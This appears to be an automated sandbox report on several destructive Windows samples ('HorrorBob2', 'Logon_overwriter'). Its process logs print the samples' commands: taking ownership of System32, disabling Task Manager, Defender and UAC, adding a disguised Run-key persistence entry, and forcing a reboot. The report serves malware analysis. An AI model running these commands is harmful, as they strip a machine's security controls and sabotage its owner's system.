"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

N/A

Files

memory/1676-0-0x00000000009C0000-0x00000000009CE000-memory.dmp

memory/1676-1-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

memory/1676-2-0x000000001B330000-0x000000001B3B0000-memory.dmp

memory/1676-4-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:57

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 172.217.20.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 202.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240215-en

Max time kernel

122s

Max time network

129s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Resources\LogonUI.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4348-0-0x00000000006D0000-0x00000000006DA000-memory.dmp

memory/4348-1-0x00007FFF27130000-0x00007FFF27BF1000-memory.dmp

memory/4348-2-0x000000001B390000-0x000000001B3A0000-memory.dmp

memory/4348-3-0x00007FFF27130000-0x00007FFF27BF1000-memory.dmp

memory/4348-4-0x000000001B390000-0x000000001B3A0000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

141s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\SpongebobFuck.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1027.tmp\SpongebobFuck.cmd""

Network

N/A

Files

memory/2240-0-0x0000000000400000-0x00000000007BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1027.tmp\SpongebobFuck.cmd

MD5 7a918ed93f7fb297e05464edccc46756
SHA1 9464288fed7ba5d88928265882def5e05ffbe7db
SHA256 82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512 cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1

memory/2240-17-0x0000000000400000-0x00000000007BF000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:57

Platform

win7-20240221-en

Max time kernel

141s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Bat To Exe Converter\Bat_To_Exe_Converter.exe"

Network

N/A

Files

memory/2848-0-0x0000000000400000-0x00000000004FA000-memory.dmp

memory/2848-5-0x0000000000400000-0x00000000004FA000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:54

Platform

win10v2004-20240226-en

Max time kernel

15s

Max time network

21s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" C:\Windows\system32\LogonUI.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4316 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 4316 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 4316 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3984 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3984 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3984 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3984 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3984 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3984 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3984 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3984 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3984 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3984 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4072 wrote to memory of 2580 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4072 wrote to memory of 2580 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4072 wrote to memory of 2580 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3984 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 3984 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 3984 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\373C.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa394b855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp

Files

memory/4316-0-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\373C.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

C:\Users\Admin\AppData\Local\Temp\373C.tmp\prompt.vbs

MD5 52ac951762c9b42fb4492dfdde2ba4ae
SHA1 0821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA256 9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512 c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

C:\Users\Admin\AppData\Local\Temp\373C.tmp\blood.bmp

MD5 040d29b801e3488f7aee3f9708128eea
SHA1 433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256 fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA512 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

C:\Users\Admin\AppData\Local\Temp\373C.tmp\Service64.exe

MD5 ea8f1afb1f5f51d58a47e702f97736f4
SHA1 fc9417a69a28bb0dc5d71b452a059a992564f0bf
SHA256 2021adc7a1206977bc7886c997ed3024563922a1858cb2b1f6c8039d0ba29db0
SHA512 f423c33952456c9b83f8597d1d7c03ad8cf8ef4b2f95494547e5bdc15d6334e492d7da21bff7659bae9a1c98ab5865e6117aa507f3d4632c08b195b2a1ed5c29

memory/4316-18-0x0000000000400000-0x000000000132F000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:53

Platform

win7-20240215-en

Max time kernel

7s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe"

Signatures

Disables Task Manager via registry modification

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "c:\\System64\\bg.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2132 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\horrorbob.exe C:\Windows\SysWOW64\cmd.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2504 wrote to memory of 2392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
